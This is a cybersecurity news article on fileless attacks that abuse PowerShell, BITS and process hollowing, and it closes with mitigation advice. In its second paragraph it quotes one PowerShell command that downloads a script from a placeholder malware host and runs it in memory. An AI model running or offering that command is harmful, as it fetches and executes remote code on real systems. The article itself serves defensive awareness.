HomeCyber BalkansHackers Utilizing PowerShell and Microsoft Authorized Applications for Malware Deployment

Hackers Utilizing PowerShell and Microsoft Authorized Applications for Malware Deployment

Published on

spot_img

Cybersecurity experts are currently issuing a caution against a rising trend in fileless attacks. These attacks involve hackers using PowerShell and legitimate Microsoft applications to deploy malware without leaving noticeable traces on compromised systems. This strategy has been in use for over two decades and has proven to be quite effective in bypassing traditional antivirus solutions and complicating efforts to respond to security incidents.

One of the main techniques employed by attackers is the abuse of PowerShell, Microsoft’s scripting language. By utilizing commands such as “iex((New-Object Net.WebClient).DownloadString(‘https://malware.com/payload.ps1’))”, hackers can retrieve and execute malicious scripts directly in memory without saving them to disk. This makes it incredibly challenging for standard security tools to detect such malicious activities. In addition to PowerShell, threat actors are also resorting to LOLBAS (Living Off the Land Binaries and Scripts) techniques. These methods involve misusing legitimate Microsoft applications and utilities to carry out malicious activities.

For example, the BITS (Background Intelligent Transfer Service) admin tool can be exploited to download and execute malware payloads when systems are inactive, effectively bypassing security controls. Another critical aspect of fileless attacks is memory injection, which allows attackers to disguise their malware as legitimate processes. One specific technique, known as Process Hollowing, involves executing a legitimate application in a suspended state, replacing its code in memory with malicious payload, and then resuming execution. This method, which was initially popularized by the Stuxnet malware, enables attackers to run their code under the guise of trusted system processes.

To mitigate the risk of fileless attacks, cybersecurity experts suggest implementing a multi-layered approach. This includes deploying Endpoint Detection and Response (EDR) solutions, enhancing memory analysis and monitoring capabilities, enabling comprehensive PowerShell logging, and implementing PowerShell Constrained Language Mode. Organizations are also advised to closely monitor Active Directory and regularly conduct Red Teaming exercises to identify and address vulnerabilities.

As fileless attacks continue to evolve, it has become evident that traditional file-based security measures are no longer sufficient. Organizations must adjust their security strategies to combat these advanced threats by focusing on behavior-based detection and robust monitoring of system activities throughout their entire network infrastructure. By staying vigilant and proactive in their cybersecurity efforts, businesses can better protect themselves against increasingly sophisticated cyber threats.

In conclusion, the rise of fileless attacks underscores the need for organizations to adapt and strengthen their cybersecurity defenses to effectively counter the evolving tactics of malicious actors. By embracing a multi-layered security approach and investing in advanced threat detection and monitoring capabilities, businesses can better safeguard their sensitive data and infrastructure from the growing threat landscape of today’s digital world.

Source link

Latest articles

The Battle Behind the Screens

 As the world watches the escalating military conflict between Israel and Iran, another...

Can we ever fully secure autonomous industrial systems?

 In the rapidly evolving world of industrial IoT (IIoT), the integration of AI-driven...

The Hidden AI Threat to Your Software Supply Chain

AI-powered coding assistants like GitHub’s Copilot, Cursor AI and ChatGPT have swiftly transitioned...

Why Business Impact Should Lead the Security Conversation

 Security teams face growing demands with more tools, more data, and higher expectations...

More like this

The Battle Behind the Screens

 As the world watches the escalating military conflict between Israel and Iran, another...

Can we ever fully secure autonomous industrial systems?

 In the rapidly evolving world of industrial IoT (IIoT), the integration of AI-driven...

The Hidden AI Threat to Your Software Supply Chain

AI-powered coding assistants like GitHub’s Copilot, Cursor AI and ChatGPT have swiftly transitioned...